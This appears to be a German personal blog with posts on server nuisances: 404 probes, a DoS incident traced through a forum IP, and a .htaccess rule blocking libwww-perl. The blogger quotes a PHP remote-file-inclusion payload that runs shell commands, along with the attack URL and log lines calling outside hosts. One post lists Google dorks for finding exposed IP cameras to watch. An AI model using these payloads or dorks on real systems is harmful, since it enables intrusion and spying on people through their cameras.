Heftig...
Welche Domains besitzt du
Heult doch
Crysis Demo (1.8 GB)
Social Bookmarking Dienste
Endlich mal ein Durchblicker

Manchmal kann das auch ganz schön lästig sein, wenn man bei jeder nicht gefunden Seiten auf dem Server (404) eine Mail erhält. Schon seit 2 Stunden fliegen hier im Minutentakt Fehlermeldungen des Useragents "Wget" von der IP 209.218.171.178 (178.171.218.209.transedge.com) ein, weil von dort versucht wird die Adresse /sl_secret_ping_button/00:1C:10:89:C4:9D aufzurufen.

Was immer das sein mag... 00:1C:10 ist meines Wissens nach Netgear... Auf jeden Fall nervt es. Also muss ich wohl die IP sperren. Wer sich angesprochen fühlt, kann sich ja einfach melden

Nettes Spiel
Personalisiertes Toilettenpapier
Abmahnen leicht gemacht
Open Source DVD 7.0
Krater

Heute habe ich eine neue kleine Hackvariante bemerkt:

Es wird versucht die Datei
/xtcommerce/admin/includes/classes/spaw/spaw_control.class.php?spaw_root =http://www.humaniora.sdu.dk/gcrg/modules/Downloads_flsmidth/echo.txt

aufzurufen und echo.txt sieht dann so aus:


< ? php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Keine Ahnung was das macht... Klappt ja eh nicht.

Wer eine Videoüberwachungssoftware wie Netcam Watcher benutzt, der hat ja vielleicht auch mal Lust nicht nur seine eigene Kamera anzusehen, sondern auch öffentliche Kameras in seine Überwachungssoftware hinzu zu fügen. Um "öffentliche" Kameras zu finden, kann man ganz einfach Google nutzen. Einige Parameter helfen bei der Suche:

inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg (und dann nur die IP Adresse anwählen)
inurl:axis-cgi/mjpg
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis (Mit Modellnummern variieren)
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”


Und da wird man unter Garantie noch Kameras finden, die man in seinen Netcam Watcher hinzufügen kann, sofern die Lizenzierung der maximalen Kameras das zulässt.

In den letzten beiden Nächten wurde einer unserer Server durch DOS Attacken in die Knie gezwungen. Da wir ja nun schon die TURK Telekom ausgesperrt hatten, lag die Vermutung nah, dass es sich dieses Mal um einen Angriff aus Deutschland handelte.

In der ersten Nacht hatten wir noch gar nichts gemacht. In der zweiten Nacht in Folge haben wir dann aber live mit dem Hoster des Rechenzentrums die Logfiles beobachtet und eigentlich immer sofort live die IP Adresse des Angreifers bekommen. Gleich bei der ersten Attacke konnten wir die IP Adresse einem Besucher eines unserer Foren zuordnen. Pech für den Angreifer, denn damit stand zweifelsfrei fest, dass er da seine Skripte ausprobierte (und die schienen ganz gut zu funktionieren).

Zur Sicherheit haben wir ihn noch per Messenger angeschrieben und so eine Direktverbindung hergestellt. Dann noch schnell das Address Reolution Protokoll auslesen und huch? Schon wieder die gleiche IP Adresse zum nächsten Angriff. Abstreiten ist also zwecklos gewesen.

Da der gute Mann sich alle paar Minuten neu ins Internet wählte brachte es nichts seine IP zu sperren. Also haben wir seine Browserkennung gesperrt. Nachdem er das bemerkte, hat er dann seine Browserkennung auf den Google-Bot geändert. Also hätten wir nun das Spiel noch einige Stunden treiben können oder auch nicht. Also haben wir ihn nochmal angetickert, um wieder die IP zu vergleichen. Naja, die Überraschung war nicht groß...

Der Hoster hat dann noch einige Änderungen an der Serverkonfiguration vorgenommen und noch ein Skript eingebaut, das es in der Zukunft etwas schwieriger macht den kompletten Server lahmzulegen. Und das alles mitten in der Nacht...

Momentan läuft alles wieder ganz gut, man weiß aber nicht wie lange. Wie geht es aber weiter?

Anzeige wegen rechtswidriger Datenunterdrückung (enthalten im § 303a StGB) an den Angreifer.
Schadenersatzforderung wegen ausgebliebener Werbeeinnahmen.
Schadenersatzforderung wegen ausgebliebener Umsätze auf den ebenfalls auf diesem Server liegenden Onlineshops.
Schadenersatzforderung wegen umsonst gezahlter Google Adsense Werbung (die Klicks liefen ja alle ins Leere).
Forderungen des Hosters wegen Technikerstunden, Bereitschaftsstunden und wahrscheinlich einer inzwischen defekten Netzwerkkarte.
Das wird ganz locker ein vierstelliger Betrag, wenn es zu einer Verurteilung kommt. Theoretisch kann man das sogar mit 5 Jahren Haft bestrafen.

Man zeigt so etwas ganz normal auf dem Polizeirevier an und es hilft, wenn man den § 303a gleich im Gepäck hat, weil nicht jeder Polizist auch sofort weiß wovon man spricht

Ich bin mir persönlich nicht mehr ganz sicher, ob eine DOS Attacke wirklich die richtige Idee war, denn teuer wird das nun in jedem Fall. Pech ist halt, dass man nichtmal bei einem Provider die herausgabe der IP Adresse beantragen muss, sondern dass der User zu unvorsichtig war in einem Forum mit der gleichen IP eingeloggt zu sein und auf den Trick mit der Direktverbindung ist er auch hereingefallen.

Wenn jemand von euch auf der Suche nach einem wirklich guten Hoster ist, der euch auch in solchen Situationen nicht alleine lässt, der sollte unbedingt zu Artfiles gehen /wechseln!

Es scheint wirklich groß in Mode zu sein, mit automatisierten Skripts Schwachstellen auf Webservern zu suchen. Falls hier bald nichts mehr antwortet, dann hat das was hiermit zu tun :

2007-04-19 22:27 unknown libwww-perl/5.65 nwns0001.nwwnet.net
2007-04-19 22:27 unknown libwww-perl/5.79 222.236.47.187
2007-04-19 22:27 unknown libwww-perl/5.803 203.85.114.102
2007-04-19 22:26 unknown libwww-perl/5.79 flex2532-001.flexservers. com
2007-04-19 22:26 unknown libwww-perl/5.805 psts.net.ua
2007-04-19 22:26 unknown libwww-perl/5.79 222.236.47.187
2007-04-19 22:25 unknown libwww-perl/5.79 flex2532-001.flexservers. com
2007-04-19 22:25 unknown libwww-perl/5.65 nwns0001.nwwnet.net
2007-04-19 22:25 unknown libwww-perl/5.65 ns3.rosehosting.com
2007-04-19 22:25 unknown libwww-perl/5.79 59-125-93-22.HINET-IP.hin et.net
2007-04-19 22:25 unknown libwww-perl/5.805 smile.vanleuven.com
2007-04-19 22:24 unknown libwww-perl/5.65 nwns0001.nwwnet.net

65.123.73.11 - - [19/Apr/2007:22:24:59 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163485 "-" "libwww-perl/5.65"
217.78.242.26 - - [19/Apr/2007:22:25:00 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163863 "-" "libwww-perl/5.805"
59.125.93.22 - - [19/Apr/2007:22:25:07 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163485 "-" "libwww-perl/5.79"
209.135.140.145 - - [19/Apr/2007:22:25:18 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163499 "-" "libwww-perl/5.65"
65.123.73.11 - - [19/Apr/2007:22:25:19 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163491 "-" "libwww-perl/5.65"
89.255.3.4 - - [19/Apr/2007:22:25:51 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163492 "-" "libwww-perl/5.79"
222.236.47.187 - - [19/Apr/2007:22:26:03 +0200] "GET //naboard//naboard_pnr.php?skin=http://212.191.87.139/solo/cat.c? HTTP/1.1" 404 163576 "-" "libwww-perl/5.79"

Da probiert gerade ein Bot hier auf dem Server Schwachstellen zu finden.
siehe hier

Update: Jemand hat danach gesucht wie man den User-Agent libwww-perl aussperren kann:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ - [F]

in die .htaccess eintragen.